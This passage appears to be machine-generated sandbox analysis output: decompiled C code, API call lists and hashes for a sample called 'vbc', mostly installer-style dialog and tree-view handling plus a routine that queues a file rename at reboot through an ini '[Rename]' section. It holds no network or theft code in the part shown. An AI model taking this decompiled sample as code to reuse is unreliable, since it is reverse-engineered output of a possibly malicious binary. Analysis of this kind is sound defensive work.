                                                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                        										if(_t207 != 0) {
                                                        											_t303 =  *_t292;
                                                        											_v72 = _t207;
                                                        											_v76 = 8;
                                                        											if((_t303 & 0x00000001) != 0) {
                                                        												_v76 = 9;
                                                        												_v60 =  &(_t292[4]);
                                                        												_t292[0] = _t292[0] & 0x000000fe;
                                                        											}
                                                        											if((_t303 & 0x00000040) == 0) {
                                                        												_t211 = (_t303 & 0x00000001) + 1;
                                                        												if((_t303 & 0x00000010) != 0) {
                                                        													_t211 = _t211 + 3;
                                                        												}
                                                        											} else {
                                                        												_t211 = 3;
                                                        											}
                                                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                        										}
                                                        										_v24 = _v24 + 1;
                                                        										_t292 =  &(_t292[0x206]);
                                                        									} while (_v24 <  *0x7a8acc);
                                                        									goto L86;
                                                        								} else {
                                                        									_t293 = E004012E2( *0x7a1f80);
                                                        									E00401299(_t293);
                                                        									_t222 = 0;
                                                        									_t301 = 0;
                                                        									if(_t293 <= 0) {
                                                        										L74:
                                                        										SendMessageW(_v12, 0x14e, _t301, 0);
                                                        										_a16 = _t293;
                                                        										_a8 = 0x420;
                                                        										goto L75;
                                                        									} else {
                                                        										goto L71;
                                                        									}
                                                        									do {
                                                        										L71:
                                                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                        											_t301 = _t301 + 1;
                                                        										}
                                                        										_t222 = _t222 + 1;
                                                        									} while (_t222 < _t293);
                                                        									goto L74;
                                                        								}
                                                        							}
                                                        						}
                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                        							goto L93;
                                                        						} else {
                                                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                        							if(_t232 == 0xffffffff) {
                                                        								goto L93;
                                                        							}
                                                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                        								_t294 = 0x20;
                                                        							}
                                                        							E00401299(_t294);
                                                        							SendMessageW(_a4, 0x420, 0, _t294);
                                                        							_a12 = _a12 | 0xffffffff;
                                                        							_a16 = 0;
                                                        							_a8 = 0x40f;
                                                        							goto L56;
                                                        						}
                                                        					}
                                                        				} else {
                                                        					_v36 = 0;
                                                        					_v20 = 2;
                                                        					 *0x7a8b00 = _t291;
                                                        					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
                                                        					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
                                                        					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
                                                        					_t297 = _t258;
                                                        					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
                                                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                        					 *0x7a1f6c = _t260;
                                                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                        					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
                                                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                        					}
                                                        					DeleteObject(_t297);
                                                        					_t298 = 0;
                                                        					do {
                                                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                        							if(_t298 != 0x20) {
                                                        								_v20 = 0;
                                                        							}
                                                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
                                                        						}
                                                        						_t298 = _t298 + 1;
                                                        					} while (_t298 < 0x21);
                                                        					_t299 = _a16;
                                                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                        					_push(0x15);
                                                        					E004045CA(_a4);
                                                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                        					_push(0x16);
                                                        					E004045CA(_a4);
                                                        					_t300 = 0;
                                                        					_v16 = 0;
                                                        					if( *0x7a8acc <= 0) {
                                                        						L19:
                                                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                        						goto L20;
                                                        					} else {
                                                        						_t319 = _v24 + 8;
                                                        						_v32 = _t319;
                                                        						do {
                                                        							_t278 =  &(_t319[0x10]);
                                                        							if( *_t278 != 0) {
                                                        								_v64 = _t278;
                                                        								_t279 =  *_t319;
                                                        								_v88 = _v16;
                                                        								_t311 = 0x20;
                                                        								_v84 = 0xffff0002;
                                                        								_v80 = 0xd;
                                                        								_v68 = _t311;
                                                        								_v44 = _t300;
                                                        								_v72 = _t279 & _t311;
                                                        								if((_t279 & 0x00000002) == 0) {
                                                        									if((_t279 & 0x00000004) == 0) {
                                                        										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                        									} else {
                                                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                        									}
                                                        								} else {
                                                        									_v80 = 0x4d;
                                                        									_v48 = 1;
                                                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                        									_v36 = 1;
                                                        									 *( *0x7a1f80 + _t300 * 4) = _t284;
                                                        									_v16 =  *( *0x7a1f80 + _t300 * 4);
                                                        								}
                                                        							}
                                                        							_t300 = _t300 + 1;
                                                        							_t319 =  &(_v32[0x818]);
                                                        							_v32 = _t319;
                                                        						} while (_t300 <  *0x7a8acc);
                                                        						if(_v36 != 0) {
                                                        							L20:
                                                        							if(_v20 != 0) {
                                                        								E004045FF(_v8);
                                                        								goto L23;
                                                        							} else {
                                                        								ShowWindow(_v12, 5);
                                                        								E004045FF(_v12);
                                                        								L93:
                                                        								return E00404631(_a8, _a12, _a16);
                                                        							}
                                                        						}
                                                        						goto L19;
                                                        					}
                                                        				}
                                                        			}

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 0040504F
                                                        • GetDlgItem.USER32(?,00000408), ref: 0040505A
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                                                        • LoadImageW.USER32 ref: 004050BB
                                                        • SetWindowLongW.USER32 ref: 004050D4
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                                                        • DeleteObject.GDI32(00000000), ref: 00405131
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                                                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                                                        • SetWindowLongW.USER32 ref: 00405283
                                                        • ShowWindow.USER32(?,00000005), ref: 00405293
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405461
                                                        • GlobalFree.KERNEL32(?), ref: 00405471
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                                                        • ShowWindow.USER32(?,00000000), ref: 0040561B
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405626
                                                        • ShowWindow.USER32(00000000), ref: 0040562D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                                        • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                                                        • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                                        • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 91%
                                                        			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                        				char _v8;
                                                        				int _v12;
                                                        				void* _v16;
                                                        				struct HWND__* _t56;
                                                        				signed int _t75;
                                                        				signed short* _t76;
                                                        				signed short* _t78;
                                                        				long _t92;
                                                        				int _t103;
                                                        				signed int _t110;
                                                        				intOrPtr _t113;
                                                        				WCHAR* _t114;
                                                        				signed int* _t116;
                                                        				WCHAR* _t117;
                                                        				struct HWND__* _t118;
                                                        
                                                        				if(_a8 != 0x110) {
                                                        					if(_a8 != 0x111) {
                                                        						L13:
                                                        						if(_a8 != 0x4e) {
                                                        							if(_a8 == 0x40b) {
                                                        								 *0x79ff54 =  *0x79ff54 + 1;
                                                        							}
                                                        							L27:
                                                        							_t114 = _a16;
                                                        							L28:
                                                        							return E00404631(_a8, _a12, _t114);
                                                        						}
                                                        						_t56 = GetDlgItem(_a4, 0x3e8);
                                                        						_t114 = _a16;
                                                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                        							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                        							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                        							_v12 = _t103;
                                                        							_v16 = _t113;
                                                        							_v8 = 0x7a6a40;
                                                        							if(_t103 - _t113 < 0x800) {
                                                        								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                        								SetCursor(LoadCursorW(0, 0x7f02));
                                                        								_push(1);
                                                        								_t44 =  &_v8; // 0x7a6a40
                                                        								E00404A38(_a4,  *_t44);
                                                        								SetCursor(LoadCursorW(0, 0x7f00));
                                                        								_t114 = _a16;
                                                        							}
                                                        						}
                                                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                        							goto L28;
                                                        						} else {
                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                        								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
                                                        							}
                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                        								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
                                                        							}
                                                        							return 1;
                                                        						}
                                                        					}
                                                        					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t116 =  *0x7a0f60 + 0x14;
                                                        						if(( *_t116 & 0x00000020) == 0) {
                                                        							goto L27;
                                                        						}
                                                        						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                        						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                        						E00404A14();
                                                        						goto L13;
                                                        					}
                                                        				}
                                                        				_t117 = _a16;
                                                        				_t75 =  *(_t117 + 0x30);
                                                        				if(_t75 < 0) {
                                                        					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
                                                        				}
                                                        				_t76 =  *0x7a8ad8 + _t75 * 2;
                                                        				_t110 =  *_t76 & 0x0000ffff;
                                                        				_a8 = _t110;
                                                        				_t78 =  &(_t76[1]);
                                                        				_a16 = _t78;
                                                        				_v16 = _t78;
                                                        				_v12 = 0;
                                                        				_v8 = E0040473A;
                                                        				if(_t110 != 2) {
                                                        					_v8 = E00404700;
                                                        				}
                                                        				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                        				_push(0x22);
                                                        				E004045CA(_a4);
                                                        				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                        				_push(0x23);
                                                        				E004045CA(_a4);
                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                        				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                        				_t118 = GetDlgItem(_a4, 0x3e8);
                                                        				E004045FF(_t118);
                                                        				SendMessageW(_t118, 0x45b, 1, 0);
                                                        				_t92 =  *( *0x7a8ab0 + 0x68);
                                                        				if(_t92 < 0) {
                                                        					_t92 = GetSysColor( ~_t92);
                                                        				}
                                                        				SendMessageW(_t118, 0x443, 0, _t92);
                                                        				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                        				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                        				 *0x79ff54 = 0;
                                                        				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                        				 *0x79ff54 = 0;
                                                        				return 0;
                                                        			}

                                                        Instruction addresses, one per line of the C code above in source order: 0x0040479b 0x004048c8 0x00404925 0x00404929 0x004049f6 0x004049f8 0x004049f8 0x004049fe 0x004049fe 0x00404a01 0x00000000 0x00404a08 0x00404937 0x0040493d 0x00404947 0x00404952 0x00404955 0x00404958 0x00404963 0x00404966 0x0040496d 0x0040497a 0x0040498b 0x00404991 0x00404993 0x00404999 0x004049a7 0x004049ad 0x004049ad 0x0040496d 0x004049b7 0x00000000 0x004049c2 0x004049c6 0x004049d6 0x004049d6 0x004049dc 0x004049e8 0x004049e8 0x00000000 0x004049ec 0x004049b7 0x004048d3 0x00000000 0x004048e5 0x004048ea 0x004048f0 0x00000000 0x00000000 0x00404919 0x0040491b 0x00404920 0x00000000 0x00404920 0x004048d3 0x004047a1 0x004047a4 0x004047a9 0x004047ba 0x004047ba 0x004047c2 0x004047c5 0x004047c9 0x004047cc 0x004047d0 0x004047d3 0x004047d6 0x004047d9 0x004047e0 0x004047e2 0x004047e2 0x004047ec 0x004047f9 0x00404803 0x00404808 0x0040480b 0x00404810 0x00404827 0x0040482e 0x00404841 0x00404844 0x00404858 0x0040485f 0x00404864 0x00404869 0x00404869 0x00404877 0x00404885 0x00404897 0x0040489c 0x004048ac 0x004048ae 0x00000000

                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040483B
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                                                        • GetSysColor.USER32 ref: 00404869
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                                                        • lstrlenW.KERNEL32(?), ref: 0040488A
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404905
                                                        • SendMessageW.USER32(00000000), ref: 0040490C
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404937
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                                                        • LoadCursorW.USER32 ref: 00404988
                                                        • SetCursor.USER32(00000000), ref: 0040498B
                                                        • LoadCursorW.USER32 ref: 004049A4
                                                        • SetCursor.USER32(00000000), ref: 004049A7
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: @jz$N
                                                        • API String ID: 3103080414-4087404676
                                                        • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                                        • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                                                        • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                                        • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004062B4(void* __ecx) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				long _t12;
                                                        				long _t24;
                                                        				char* _t31;
                                                        				int _t37;
                                                        				void* _t38;
                                                        				intOrPtr* _t39;
                                                        				long _t42;
                                                        				WCHAR* _t44;
                                                        				void* _t46;
                                                        				void* _t48;
                                                        				void* _t49;
                                                        				void* _t52;
                                                        				void* _t53;
                                                        
                                                        				_t38 = __ecx;
                                                        				_t44 =  *(_t52 + 0x14);
                                                        				 *0x7a5628 = 0x55004e;
                                                        				 *0x7a562c = 0x4c;
                                                        				if(_t44 == 0) {
                                                        					L3:
                                                        					_t2 = _t52 + 0x1c; // 0x7a5e28
                                                        					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                        						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
                                                        						_t53 = _t52 + 0x10;
                                                        						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
                                                        						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
                                                        						_t48 = _t12;
                                                        						 *(_t53 + 0x18) = _t48;
                                                        						if(_t48 != 0xffffffff) {
                                                        							_t42 = GetFileSize(_t48, 0);
                                                        							_t6 = _t37 + 0xa; // 0xa
                                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                        							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
                                                        								L18:
                                                        								return CloseHandle(_t48);
                                                        							} else {
                                                        								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
                                                        									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
                                                        									if(_t49 == 0) {
                                                        										_t48 =  *(_t53 + 0x18);
                                                        										L16:
                                                        										_t24 = _t42;
                                                        										L17:
                                                        										E00406119(_t24 + _t46, 0x7a5228, _t37);
                                                        										SetFilePointer(_t48, 0, 0, 0);
                                                        										E00406210(_t48, _t46, _t42 + _t37);
                                                        										GlobalFree(_t46);
                                                        										goto L18;
                                                        									}
                                                        									_t39 = _t46 + _t42;
                                                        									_t31 = _t39 + _t37;
                                                        									while(_t39 > _t49) {
                                                        										 *_t31 =  *_t39;
                                                        										_t31 = _t31 - 1;
                                                        										_t39 = _t39 - 1;
                                                        									}
                                                        									_t24 = _t49 - _t46 + 1;
                                                        									_t48 =  *(_t53 + 0x18);
                                                        									goto L17;
                                                        								}
                                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                        								_t42 = _t42 + 0xa;
                                                        								goto L16;
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					CloseHandle(E0040615E(_t44, 0, 1));
                                                        					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                        						goto L3;
                                                        					}
                                                        				}
                                                        				return _t12;
                                                        			}

                                                        Instruction addresses, one per line of the C code above in source order: 0x004062b4 0x004062bd 0x004062c4 0x004062ce 0x004062e2 0x0040630a 0x00406311 0x00406315 0x00406319 0x00406339 0x00406340 0x0040634a 0x00406357 0x0040635c 0x00406361 0x00406365 0x00406374 0x00406376 0x00406383 0x00406387 0x00406422 0x00000000 0x0040639d 0x004063aa 0x004063ce 0x004063d2 0x004063f1 0x004063f5 0x004063f5 0x004063f7 0x00406400 0x0040640b 0x00406416 0x0040641c 0x00000000 0x0040641c 0x004063d4 0x004063d7 0x004063e2 0x004063de 0x004063e0 0x004063e1 0x004063e1 0x004063e9 0x004063eb 0x00000000 0x004063eb 0x004063b5 0x004063bb 0x00000000 0x004063bb 0x00406387 0x00406365 0x004062e4 0x004062ef 0x004062f8 0x004062fc 0x00000000 0x00000000 0x004062fc 0x0040642d

                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000), ref: 004062EF
                                                        • GetShortPathNameW.KERNEL32 ref: 004062F8
                                                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                                        • GetShortPathNameW.KERNEL32 ref: 00406315
                                                        • wsprintfA.USER32 ref: 00406333
                                                        • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                                                        • GlobalFree.KERNEL32(00000000), ref: 0040641C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00406423
                                                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                                                        • API String ID: 2171350718-2000197835
                                                        • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                                        • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                                                        • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                                        • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 90%
                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                        				struct tagLOGBRUSH _v16;
                                                        				struct tagRECT _v32;
                                                        				struct tagPAINTSTRUCT _v96;
                                                        				struct HDC__* _t70;
                                                        				struct HBRUSH__* _t87;
                                                        				struct HFONT__* _t94;
                                                        				long _t102;
                                                        				signed int _t126;
                                                        				struct HDC__* _t128;
                                                        				intOrPtr _t130;
                                                        
                                                        				if(_a8 == 0xf) {
                                                        					_t130 =  *0x7a8ab0;
                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                        					_a8 = _t70;
                                                        					GetClientRect(_a4,  &_v32);
                                                        					_t126 = _v32.bottom;
                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                        					while(_v32.top < _t126) {
                                                        						_a12 = _t126 - _v32.top;
                                                        						asm("cdq");
                                                        						asm("cdq");
                                                        						asm("cdq");
                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                        						_v32.bottom = _v32.bottom + 4;
                                                        						_a16 = _t87;
                                                        						FillRect(_a8,  &_v32, _t87);
                                                        						DeleteObject(_a16);
                                                        						_v32.top = _v32.top + 4;
                                                        					}
                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                        						_a16 = _t94;
                                                        						if(_t94 != 0) {
                                                        							_t128 = _a8;
                                                        							_v32.left = 0x10;
                                                        							_v32.top = 8;
                                                        							SetBkMode(_t128, 1);
                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                        							_a8 = SelectObject(_t128, _a16);
                                                        							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
